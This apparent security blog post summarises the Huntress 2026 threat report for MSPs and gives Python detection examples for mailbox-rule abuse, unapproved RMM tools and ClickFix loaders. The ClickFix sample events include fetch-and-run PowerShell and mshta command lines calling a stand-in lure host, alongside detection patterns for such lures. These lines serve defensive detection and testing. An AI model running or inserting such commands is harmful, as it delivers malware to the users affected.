
Huntress 2026 Cyber Threat Report: Key Findings for MSPs

Analysis of the Huntress 2026 Cyber Threat Report covering identity compromise, RMM abuse, ClickFix loaders, ransomware timelines, and a 30-day action plan.


Huntress published their 2026 Cyber Threat Report based on telemetry from more than 4.6 million endpoints and 9.4 million identities observed during 2025. The dataset is heavily weighted toward SMB environments and the MSP channel, which makes it directly relevant for teams managing client infrastructure at scale.

This article extracts the most operationally useful findings and maps them to concrete controls.

Identity compromise is the top threat vector

The shift is clear: initial access increasingly starts with user and identity compromise rather than traditional malware delivery. The report breaks identity-related threats into four main categories.

  • Access policy violations: 37.2%
  • Mailbox manipulation: 19.0%
  • AiTM phishing: 18.9%
  • OAuth abuse: 10.1%
  • Other: 14.8%

Access policy and trust boundary violations lead at 37.2%, covering conditional access failures, impossible travel detections, and credential reuse from breached databases.

Adversary-in-the-middle (AiTM) phishing at 18.9% is particularly concerning because it bypasses traditional MFA. Attackers proxy authentication sessions in real time, capturing both credentials and session tokens.

The identity compromise attack chain

These aren’t isolated events. The report documents a repeatable intrusion chain that progresses from initial credential access through to business impact.

  1. Credential theft: phishing, infostealer, or a breached credential dump
  2. Initial access: the valid credentials are used to sign in
  3. MFA check: with no MFA the attacker gets direct mailbox access; with MFA, an AiTM proxy or OAuth abuse yields the same mailbox access
  4. Mailbox rule creation: auto-forward or delete rules
  5. Business email compromise: invoice fraud or data theft
  6. In parallel, lateral movement from the mailbox into SharePoint and OneDrive

The key defensive takeaway: each stage of this chain offers a detection opportunity. Enforce conditional access with strict location and device constraints, alert on mailbox rule creation and hidden forwarding, and treat suspicious token reuse as an incident trigger, not low-priority noise.
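To make the mailbox-rule detection concrete, here is an added example (not code from Huntress or the report) that scores inbox-rule events shaped like Microsoft 365 Unified Audit Log records. The sample records, the tenant domain `example.test`, and the folder and keyword lists are constructed assumptions to tune to your own tenants.

```python
# Constructed sample records in the shape of Microsoft 365 Unified Audit Log
# entries for Exchange inbox-rule operations. Parameter names mirror the
# New-InboxRule cmdlet parameters the audit log records; all values are invented.
SAMPLE_AUDIT_LOG = [
    {"Operation": "New-InboxRule", "UserId": "alice@example.test", "ClientIP": "203.0.113.10",
     "Parameters": [{"Name": "Name", "Value": "."},
                    {"Name": "ForwardTo", "Value": "mailbox@external.example"},
                    {"Name": "DeleteMessage", "Value": "True"}]},
    {"Operation": "New-InboxRule", "UserId": "bob@example.test", "ClientIP": "198.51.100.7",
     "Parameters": [{"Name": "Name", "Value": "Invoices"},
                    {"Name": "SubjectContainsWords", "Value": "invoice;payment"},
                    {"Name": "MoveToFolder", "Value": "RSS Subscriptions"},
                    {"Name": "MarkAsRead", "Value": "True"}]},
    {"Operation": "Set-InboxRule", "UserId": "carol@example.test", "ClientIP": "192.0.2.44",
     "Parameters": [{"Name": "Name", "Value": "Newsletters"},
                    {"Name": "MoveToFolder", "Value": "Newsletters"}]},
]

INTERNAL_DOMAINS = {"example.test"}  # assumed tenant domains; forwards elsewhere are external
FORWARD_PARAMS = {"ForwardTo", "ForwardAsAttachmentTo", "RedirectTo"}
HIDING_FOLDERS = {"rss subscriptions", "rss feeds", "conversation history",
                  "junk email", "deleted items", "archive"}  # folders users rarely open
FINANCE_WORDS = ("invoice", "payment", "wire", "bank", "remittance")

def score_rule(record):
    """Return the reasons a mailbox-rule event looks like BEC staging (empty if benign)."""
    if record.get("Operation") not in ("New-InboxRule", "Set-InboxRule"):
        return []
    params = {p["Name"]: str(p["Value"]) for p in record.get("Parameters", [])}
    reasons = []
    for name in FORWARD_PARAMS.intersection(params):  # hidden forwarding to outside the tenant
        domain = params[name].rsplit("@", 1)[-1].lower()
        if domain not in INTERNAL_DOMAINS:
            reasons.append(f"external forward via {name} to {domain}")
    if params.get("DeleteMessage", "").lower() == "true":
        reasons.append("rule deletes matching mail")
    if params.get("MoveToFolder", "").lower() in HIDING_FOLDERS:
        reasons.append(f"moves mail to rarely viewed folder {params['MoveToFolder']!r}")
    if not params.get("Name", "").strip(" .-_"):
        reasons.append("rule name is blank or punctuation only")
    if any(w in params.get("SubjectContainsWords", "").lower() for w in FINANCE_WORDS):
        reasons.append("filters on finance keywords")
    return reasons

def triage(records):
    """Return (user, client IP, reasons) for every record that scored at least one reason."""
    return [(r["UserId"], r.get("ClientIP"), hits) for r in records if (hits := score_rule(r))]
```

Feed it the JSON you export from the audit log search and route anything with an external forward or delete action to an incident, not a ticket queue.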

RMM tools: the attacker’s favorite backdoor

Remote Monitoring and Management tool abuse appeared in roughly 1 in 4 incidents, a 277% increase from the previous year. At the same time, traditional offensive tooling categories declined.

The reason is straightforward: legitimate RMM software gives attackers everything they need without raising behavioral alarms.

  • Built-in persistence mechanisms
  • Interactive remote access
  • Native command execution
  • Low behavioral contrast versus normal IT activity
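The control the article recommends for this, an explicit per-tenant RMM allowlist with first-seen alerting, as an added example (not Huntress code). The binary catalog is an illustrative subset of real product executable names, and the tenant allowlist and process events are constructed.

```python
# Illustrative subset of remote-administration binary names; extend it from your own
# RMM inventory. The product names are real, but this list is the example's, not the report's.
RMM_BINARIES = {"anydesk.exe", "teamviewer.exe", "screenconnect.clientservice.exe",
                "ateraagent.exe", "splashtopstreamer.exe"}

# Constructed per-tenant allowlist: the RMM agent each client is expected to run.
APPROVED = {"tenant-a": {"ateraagent.exe"},
            "tenant-b": {"screenconnect.clientservice.exe"}}

# Constructed process-creation events, in arrival order (paths and hosts invented).
EVENTS = [
    {"tenant": "tenant-a", "host": "WS01", "image": r"C:\Program Files\ATERA Networks\AteraAgent.exe"},
    {"tenant": "tenant-a", "host": "WS01", "image": r"C:\Program Files\ATERA Networks\AteraAgent.exe"},
    {"tenant": "tenant-a", "host": "WS07", "image": r"C:\Users\j\AppData\Local\Temp\AnyDesk.exe"},
    {"tenant": "tenant-b", "host": "SRV02", "image": r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe"},
    {"tenant": "tenant-b", "host": "WS03", "image": r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe"},
]

def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def evaluate(events, approved, rmm_binaries=RMM_BINARIES):
    """Return (severity, tenant, host, binary, reason) for RMM events that need attention.

    Unapproved RMM tools are always high severity; approved tools raise a medium
    alert only the first time they appear on a given host, so steady-state agent
    activity stays quiet while unscheduled installations surface.
    """
    seen_on_host = set()
    alerts = []
    for ev in events:
        binary = basename(ev["image"])
        if binary not in rmm_binaries:
            continue
        key = (ev["tenant"], ev["host"], binary)
        first_seen = key not in seen_on_host
        seen_on_host.add(key)
        if binary not in approved.get(ev["tenant"], set()):
            reason = "unapproved RMM tool"
            if "\\users\\" in ev["image"].lower():
                reason += " launched from a user-writable path"
            alerts.append(("high", ev["tenant"], ev["host"], binary, reason))
        elif first_seen:
            alerts.append(("medium", ev["tenant"], ev["host"], binary, "approved RMM first seen on host"))
    return alerts
```

Persist `seen_on_host` between runs (a table keyed by tenant, host and binary) so the first-seen logic survives restarts; in memory it only demonstrates the idea.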

ClickFix: social engineering at 53% of malware delivery

The report attributes 53.2% of all malware loader activity to ClickFix variants. This is a fundamental shift in how initial payloads are delivered, and it displaces the old assumption that exploitation or malicious attachments are the primary loader mechanism.

  • ClickFix social engineering: 53.2%
  • Other loader methods: 46.8%

The typical ClickFix pattern:

  1. User encounters a fake verification prompt (CAPTCHA, browser update, document viewer)
  2. The prompt instructs the user to open Run (Win+R) or Terminal and paste a command
  3. The pasted command downloads and executes a payload under the user’s context

This bypasses email security entirely because the user manually initiates execution. Traditional email filtering, sandboxing, and attachment scanning do not catch it.

What to do about it: Add detections for browser-to-shell execution pivots, restrict script interpreter abuse (PowerShell, mshta.exe, wscript.exe) in user context where business processes allow, and update awareness programs to specifically cover command-execution scams, not just link and attachment phishing.
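One way to implement the browser-to-shell pivot detection described above, as an added example that is not from the report: it inspects process-creation events for a script interpreter whose parent is the Run dialog host (explorer.exe) or a browser and whose command line carries paste-and-run traits. The parent list, indicator patterns and sample events are constructed assumptions; tune the parent set to the browsers in your fleet.

```python
import re

# Script hosts the article names, plus the shells that usually wrap them.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe", "cmd.exe"}
# Parents that indicate a user pasted into Run (explorer.exe) or a browser-driven prompt.
PIVOT_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
# Command-line traits common to paste-and-run lures; each is a separate, explainable signal.
INDICATORS = {
    "remote fetch": re.compile(r"https?://|invoke-webrequest|\biwr\b|downloadstring|\bcurl\b", re.I),
    "in-memory exec": re.compile(r"\biex\b|invoke-expression", re.I),
    "hidden window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "encoded command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "policy bypass": re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I),
}

def classify(event):
    """Return the indicator names matched if this event looks like a ClickFix pivot, else []."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    if image not in SCRIPT_HOSTS or parent not in PIVOT_PARENTS:
        return []
    return [name for name, rx in INDICATORS.items() if rx.search(event["cmdline"])]

def hunt(events, min_hits=1):
    """Return (cmdline, matched indicators) for events with at least min_hits indicators."""
    results = []
    for ev in events:
        hits = classify(ev)
        if len(hits) >= min_hits:
            results.append((ev["cmdline"], hits))
    return results

# Constructed Sysmon-style process-creation events; hosts and command lines are invented.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": PS,            # pasted into Win+R
     "cmdline": 'powershell -w hidden -c "iwr http://lure.invalid/a | iex"'},
    {"parent": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "image": r"C:\Windows\System32\mshta.exe", "cmdline": "mshta http://lure.invalid/verify"},
    {"parent": r"C:\Windows\explorer.exe", "image": PS,            # admin running a local script
     "cmdline": r"powershell -File C:\Scripts\backup.ps1"},
    {"parent": r"C:\Windows\System32\svchost.exe", "image": PS,    # scheduled task, not a user pivot
     "cmdline": "powershell -enc aGVsbG8gd29ybGQgdGhpcyBpcyB0ZXN0"},
]
```

Raising `min_hits` to 2 trades recall for precision; the mshta case above then needs the matching Run-dialog or browser parent plus a second trait before it fires.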

Ransomware: slower but still devastating

Ransomware accounts for about 5% of observed incidents, but the operational profile has changed. The median time-to-ransom increased from 17 to 20 hours.

  • 2024 median time-to-ransom: 17h
  • 2025 median time-to-ransom: 20h
  • +3 hours median: more time to detect, but also more pre-encryption staging

Those extra 3 hours aren’t idle time. Operators are doing more credential work, reconnaissance, data exfiltration, and defense suppression before pulling the trigger on encryption. The silver lining: this creates a wider detection window if your telemetry and response processes are fast enough.

The report also shows operator concentration: Akira, Medusa, Qilin, and RansomHub represented a large share of observed ransomware operations in 2025.

Use the pre-encryption window for containment. Suspend risky identities quickly, isolate hosts showing credential-dump and lateral-movement sequences, and investigate archive/staging traffic before encryption events occur. Don’t anchor detection logic only on encryption artifacts.

Phishing: PDFs dominate

In the report’s phishing dataset, PDF was the dominant attachment type at 57.7%, far ahead of any other file format. PDFs are trusted, widely allowed through email filters, and can embed QR codes and redirect links that traditional URL scanning may miss.

Microsoft was the most impersonated brand at roughly 31.6% of phishing attempts, consistent with attackers targeting Microsoft 365 credentials as a gateway to the identity compromise chains described above.

The operational shift: phishing now frequently functions as the start of identity and session compromise chains rather than a standalone malware delivery event. Combine user reporting with automated mailbox telemetry analysis, and include post-click behavior monitoring in triage, not just message-level indicators.

Defense evasion and AI-enabled attacks

Two emerging patterns worth tracking:

Defense evasion is increasingly about gradual degradation rather than kill-switch actions. The report highlights BYOVD (Bring Your Own Vulnerable Driver) patterns, endpoint security tampering, and heavy use of PowerShell-based Defender manipulation. Mature operators add exclusions, change policies, and selectively disable telemetry, then execute later-stage actions once visibility drops. Monitor security policy drift as a first-class detection source.

AI-enabled abuse is maturing into workflow support for attackers. The report frames it as a productivity accelerator rather than a novel attack vector. Grammar and tone are no longer reliable indicators of a phishing attempt. Prioritize behavioral detections over content-quality heuristics, and validate requests through process controls rather than message style.

30-day implementation plan

Based on the report’s findings, here’s a prioritized 4-week action plan for SMB and MSP teams.

Week 1: Identity hardening

  • Enforce phishing-resistant MFA (FIDO2 / passkeys) on all admin and privileged accounts
  • Review and restrict OAuth app consent policies in Microsoft 365 and Google Workspace
  • Enable conditional access policies: block legacy auth, enforce compliant devices, flag impossible travel
  • Audit mailbox forwarding rules and transport rules across all tenants

Week 2: Endpoint controls

  • Inventory all RMM tools in use across every tenant and build an explicit allowlist
  • Alert on first-seen remote administration binaries and unscheduled installations
  • Review PowerShell execution policies and enable script block logging
  • Restrict mshta.exe, wscript.exe, and clipboard-based PowerShell execution in user context

Week 3: Email and phishing defenses

  • Enable Safe Attachments and Safe Links (or equivalent) with PDF and HTML scanning
  • Deploy DMARC at p=reject for all managed domains with proper SPF and DKIM alignment
  • Update phishing simulation campaigns to include ClickFix-style command-execution scenarios
  • Establish aggressive reporting workflows for suspicious messages

Week 4: Detection and response

  • Define a 4-hour containment SLA for identity-led incidents
  • Test backup restoration procedures for cloud workloads (SharePoint, OneDrive, Exchange Online)
  • Tune identity-based detection rules: suspicious inbox rules, OAuth grants, impossible travel, token reuse
  • Run a tabletop exercise covering the identity attack chain: credential theft through BEC and ransomware

Key takeaways

  • Identity is the primary attack surface. More than 85% of identity threats map to access policy violations, mailbox manipulation, AiTM, or OAuth abuse. Conditional access and consent policies are your first line of defense.
  • RMM governance is non-negotiable. With 277% growth in RMM abuse, an explicit allowlist and first-seen alerting are high-impact, low-effort controls.
  • ClickFix has displaced traditional loaders. Over half of malware delivery now relies on tricking users into executing commands. Update your awareness programs and detection rules accordingly.
  • The pre-encryption window is your opportunity. A 20-hour median time-to-ransom means detection and containment can happen before data is encrypted, but only if your response process is fast enough.
  • Defend against degradation, not just disruption. Attackers are incrementally weakening security controls before striking. Monitor policy drift as carefully as you monitor alerts.
